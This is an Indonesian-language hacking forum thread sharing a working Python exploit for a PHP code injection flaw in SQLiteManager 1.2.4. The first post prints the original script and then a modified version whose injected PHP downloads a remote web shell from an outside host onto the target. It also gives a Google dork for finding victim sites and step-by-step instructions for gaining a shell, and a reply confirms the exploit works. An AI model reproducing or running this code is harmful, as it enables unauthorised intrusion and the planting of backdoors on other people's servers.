> > > >


[Share] SQLiteManager 0Day Remote PHP Code Injection Vulnerability
nasa$ Offline
Blue Dragon, COBS
24 - 173
#1
12-31-2014, 01:37 AM
Dah lama ga ngepost, pengen share aja SQLiteManager 0 Day, versi yang terbukti ampuh adalah versi 1.2.4.
untuk link exploitnya: SQlitemanager.

Penampakan scriptnya:
Code:
Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:

Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/

Name: Ampps
Official Site: http://www.ampps.com/

Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================

import re
import urllib2
from urllib import urlencode
from sys import argv, exit

def strip_tags(value):
   #Strip tags with RegEx
   return re.sub('<[^>]*?>', '', value)

def getDbId(sqliteUrl, myDbName):
   #Find Components
   htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
   if htmlRes:
       #If you found it take all the rows
       td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
       #Make a dict of stripped columns
       for element in td:
           if strip_tags(element) == myDbName:
               #Return Id
               return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
   return None

def main():
   print \
       'SQLiteManager Exploit\n' + \
       'Made By RealGame\n' + \
       'http://www.RealGame.co.il\n'
   
   if len(argv) < 2:
       #replace('\\', '/') - To Do The Same In Win And Linux
       filename = argv[0].replace('\\', '/').split('/')[-1]
       
       print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
       exit()
   
   sqliteUrl = argv[1]    
   myDbName  = "phpinfo"
   myDbFile  = "phpinfo.php"
   #Create Database
   params = {'dbname'      : myDbName,
             'dbVersion'   : '2',
             'dbRealpath'  : None,
             'dbpath'      : myDbFile,
             'action'      : 'saveDb'}
   urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
   #Get Database ID
   dbId = getDbId(sqliteUrl + "left.php", myDbName)
   #If Database Created
   if dbId:
       #Create Table + Shell Creator
       params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                                     'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n',
                 'sqlFile'         : None,
                 'action'          : 'sql',
                 'sqltype'         : '1'}
       urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
       #Inject Code
       urllib2.urlopen(sqliteUrl + myDbFile, None, 120)
       #Remove Database
       urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
       
       print 'Succeed'
       return
       
   print 'Failed'

if __name__ == '__main__':
   main()


script di atas bila di jalankan masih error karena beberapa baris yang bukan kode akan di eksekusi oleh python. setelah di edit dikit menjadi:


Code:
"""
Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
"""

import re
import urllib2
from urllib import urlencode
from sys import argv, exit
 
def strip_tags(value):
    #Strip tags with RegEx
    return re.sub('<[^>]*?>', '', value)
 
def getDbId(sqliteUrl, myDbName):
    #Find Components
    htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
    if htmlRes:
        #If you found it take all the rows
        td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
        #Make a dict of stripped columns
        for element in td: 
            if strip_tags(element) == myDbName:
                #Return Id
                return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
    return None
 
def main():
    print \
        'SQLiteManager Exploit\n' + \
        'Made By RealGame\n' + \
        'http://www.RealGame.co.il\n'
     
    if len(argv) < 2:
        #replace('\\', '/') - To Do The Same In Win And Linux
        filename = argv[0].replace('\\', '/').split('/')[-1]
         
        print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
        exit()
     
    sqliteUrl = argv[1]     
    myDbName  = "xxx"
    myDbFile  = "xxx.php"
    #Create Database
    params = {'dbname'      : myDbName,
              'dbVersion'   : '2',
              'dbRealpath'  : None,
              'dbpath'      : myDbFile,
              'action'      : 'saveDb'}
    urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
    #Get Database ID
    dbId = getDbId(sqliteUrl + "left.php", myDbName)
    #If Database Created
    if dbId:
        #Create Table + Shell Creator
        params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                                      'INSERT INTO temptab VALUES (\'<?php $destination=fopen("koteka.php","w");$source=fopen("http://bejina.fr/inc.txt","r");while ($a=fread($source,1024)) fwrite($destination,$a);fclose($source);fclose($destination);  ?>\');\n',
                  'sqlFile'         : None,
                  'action'          : 'sql',
                  'sqltype'         : '1'}
        urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
        #Inject Code
        urllib2.urlopen(sqliteUrl + myDbFile, None, 120)
        #Remove Database
        urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
         
        print 'Succeed'
        return
         
    print 'Failed'
 
if __name__ == '__main__':
    main()

Pada bagian description di komentar agar tidak di eksekusi, kemudian variabel params yang sebelumnya berisi perintah untuk menampilkan phpinfo() dirubah agar membaca file dari http://www.r57shell.net/c99.txt kemudian di tulis ulang ke file yang bernama evil.php.

step by step:
1. Cari target yang sesuai dengan dork diatas
2. Jalankan script dari command line:
Code:
nasa:exploit nasa$ python nama_script.py http://target/sqlite/
SQLiteManager Exploit
Made By RealGame
http://www.RealGame.co.il

Succeed
nasa:exploit nasa$

Apabila succeed maka silahkan buka link:
http://target/sqlite/xxx.php agar backdoor bisa di tulis, kemudian buka link http://target/sqlite/evil.php untuk menjalankan shell 

3. Bila telah berhasil mendapatkan shell jangan lupa di patch agar tidak di exploit lagi oleh orang lain .. Big Grin

Terima Kasih.. 
Hacking isn't just Computers & Exploits. It's a Philosophy.
(This post was last modified: 12-31-2014, 01:38 AM by nasa.)  
Website Find
Reply

javanesse Offline

1 - 8
#2
03-08-2015, 10:01 PM
Wuah tested, dengan ubah sedikit parameter yang om nasa kasi.

nice share om nasa
(This post was last modified: 03-08-2015, 10:20 PM by javanesse.)  
Find
Reply






Users browsing this thread: 1 Guest(s)